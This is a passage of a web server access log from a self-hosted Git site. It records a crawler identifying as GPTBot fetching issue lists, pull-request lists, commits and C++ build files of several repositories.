[Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:33:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:18:33:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10160] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=open&type=all" +[17/Feb/2026:18:33:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/controller-cpp.md?display=rendered" [Client 74.7.227.38] [Length 176999] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-cpp.md" +[17/Feb/2026:18:33:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:33:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=recentupdate&state=closed&type=all" +[17/Feb/2026:18:33:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=mostcomment&state=open&type=all" +[17/Feb/2026:18:33:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastupdate&state=open&type=all" +[17/Feb/2026:18:33:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:18:33:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=recentupdate&state=open&type=all" +[17/Feb/2026:18:33:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=nearduedate&state=closed&type=all" +[17/Feb/2026:18:33:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 9991] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=recentupdate&state=open&type=all" +[17/Feb/2026:18:33:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=nearduedate&state=open&type=all" +[17/Feb/2026:18:33:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:18:33:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10167] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=nearduedate&state=open&type=all" +[17/Feb/2026:18:33:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastupdate&state=open&type=all" +[17/Feb/2026:18:33:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?project=-1&state=closed&type=all" +[17/Feb/2026:18:33:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:18:33:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/import_csv.py?display=rendered" [Client 74.7.227.38] [Length 11173] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/import_csv.py" +[17/Feb/2026:18:33:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:33:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9995] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&state=all&type=all" +[17/Feb/2026:18:33:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:33:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=mostcomment&state=all&type=all" +[17/Feb/2026:18:33:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:33:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9994] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&state=all&type=all" +[17/Feb/2026:18:33:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:33:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9986] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:18:33:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9942] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls" +[17/Feb/2026:18:33:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?files=PostgresMonitor%2fPostgresWatchdog.spec" [Client 74.7.227.38] [Length 19945] [Gzip 4.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:18:33:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?files=PostgresMonitor%2fbuild%2fPostgresWatchdog" [Client 74.7.227.38] [Length 46262] [Gzip 12.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:18:33:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9920] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=all&type=all" +[17/Feb/2026:18:33:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=farduedate&state=closed&type=all" +[17/Feb/2026:18:33:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:18:33:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:18:33:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10058] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:18:33:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10234] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:18:33:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=closed&type=all" +[17/Feb/2026:18:33:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&state=closed&type=all" +[17/Feb/2026:18:33:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 11013] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:33:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 11011] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:33:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11636] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:33:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 18927] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:33:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/build.ninja?display=rendered" [Client 74.7.227.38] [Length 11012] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/build.ninja" +[17/Feb/2026:18:33:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 11013] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:33:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 18937] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:33:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11635] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:33:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/build.ninja?display=rendered" [Client 74.7.227.38] [Length 11012] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/build.ninja" +[17/Feb/2026:18:33:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/build.ninja?display=source" [Client 74.7.227.38] [Length 16433] [Gzip 5.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/build.ninja" +[17/Feb/2026:18:33:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11635] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:33:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 18941] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:33:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11636] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:33:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11636] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:33:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 11013] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:33:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 11010] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:33:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 11012] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:33:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 11015] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:33:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 11013] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 